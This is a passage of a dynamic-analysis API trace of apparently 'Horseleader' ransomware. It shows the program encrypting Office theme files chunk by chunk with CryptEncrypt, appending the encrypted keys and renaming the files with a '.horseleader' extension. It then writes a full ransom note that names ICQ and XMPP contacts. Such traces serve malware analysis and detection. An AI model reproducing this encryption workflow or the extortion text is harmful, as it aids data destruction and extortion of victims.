dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.112] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.112] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\..") returned 69 [0246.112] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.112] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.112] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32f2700, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe32f2700, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x10db7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLENDS.ELM", cAlternateFileName="")) returned 1 [0246.112] lstrcmpiW (lpString1="BLENDS.ELM", lpString2="Windows") returned -1 [0246.112] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM") returned 77 [0246.112] StrStrIW (lpFirst="BLENDS.ELM", lpSrch=".horseleader") returned 0x0 [0246.112] lstrcmpW (lpString1="BLENDS.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.113] lstrcmpW (lpString1="BLENDS.ELM", lpString2="_uninstalling_.png") returned 1 [0246.113] lstrlenW (lpString=".testttjffg") returned 11 [0246.113] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM", lpSrch=".testttjffg") returned 0x0 [0246.113] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.113] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.113] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.113] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM") returned 77 [0246.113] StrStrW (lpFirst="BLENDS.ELM", lpSrch=".txt") returned 0x0 [0246.113] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=69047) returned 1 [0246.114] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.114] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.117] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.117] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.117] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x5edb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.117] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.119] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.119] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.119] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xbdb7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.119] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.120] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.120] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.121] CloseHandle (hObject=0x1a4) returned 1 [0246.121] GetProcessHeap () returned 0x780000 [0246.121] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.121] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM.horseleader") returned 89 [0246.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.elm.horseleader")) returned 1 [0246.122] GetProcessHeap () returned 0x780000 [0246.122] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.122] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb59ad00, ftCreationTime.dwHighDateTime=0x1c4d794, ftLastAccessTime.dwLowDateTime=0x5f729350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcb59ad00, ftLastWriteTime.dwHighDateTime=0x1c4d794, nFileSizeHigh=0x0, nFileSizeLow=0x216, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BLENDS.INF", cAlternateFileName="")) returned 1 [0246.122] lstrcmpiW (lpString1="BLENDS.INF", lpString2="Windows") returned -1 [0246.122] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF") returned 77 [0246.122] StrStrIW (lpFirst="BLENDS.INF", lpSrch=".horseleader") returned 0x0 [0246.122] lstrcmpW (lpString1="BLENDS.INF", lpString2="#Decrypt#.txt") returned 1 [0246.122] lstrcmpW (lpString1="BLENDS.INF", lpString2="_uninstalling_.png") returned 1 [0246.122] lstrlenW (lpString=".testttjffg") returned 11 [0246.122] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF", lpSrch=".testttjffg") returned 0x0 [0246.122] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.122] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.125] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF") returned 77 [0246.125] StrStrW (lpFirst="BLENDS.INF", lpSrch=".txt") returned 0x0 [0246.125] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=534) returned 1 [0246.125] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x216, lpOverlapped=0x0) returned 1 [0246.127] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.127] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x216, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x216, lpOverlapped=0x0) returned 1 [0246.127] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.127] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.127] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.127] CloseHandle (hObject=0x1a4) returned 1 [0246.128] GetProcessHeap () returned 0x780000 [0246.128] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.128] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF.horseleader") returned 89 [0246.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\BLENDS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\blends.inf.horseleader")) returned 1 [0246.132] GetProcessHeap () returned 0x780000 [0246.132] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.132] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6d2cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x885, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.132] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.132] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 78 [0246.133] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.133] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.133] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.133] lstrlenW (lpString=".testttjffg") returned 11 [0246.133] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.133] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.133] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF") returned 78 [0246.135] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.135] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2181) returned 1 [0246.135] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x885, lpOverlapped=0x0) returned 1 [0246.137] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff77b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.137] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x885, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x885, lpOverlapped=0x0) returned 1 [0246.137] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.137] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.138] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.138] CloseHandle (hObject=0x1a4) returned 1 [0246.138] GetProcessHeap () returned 0x780000 [0246.138] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.138] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.horseleader") returned 90 [0246.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\preview.gif.horseleader")) returned 1 [0246.139] GetProcessHeap () returned 0x780000 [0246.139] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.139] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5093, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.139] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.139] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 79 [0246.139] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.139] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.139] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.140] lstrlenW (lpString=".testttjffg") returned 11 [0246.140] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.140] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.140] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.140] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG") returned 79 [0246.141] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.141] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=20627) returned 1 [0246.141] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.144] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.144] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.145] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x93, lpOverlapped=0x0) returned 1 [0246.145] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.145] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x93, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x93, lpOverlapped=0x0) returned 1 [0246.145] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.145] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.146] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.146] CloseHandle (hObject=0x1a4) returned 1 [0246.146] GetProcessHeap () returned 0x780000 [0246.146] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.146] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.horseleader") returned 91 [0246.146] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\thmbnail.png.horseleader")) returned 1 [0246.147] GetProcessHeap () returned 0x780000 [0246.147] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.147] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5093, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.148] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.148] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\#Decrypt#.txt") returned 80 [0246.148] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.148] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.148] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.150] lstrlenA 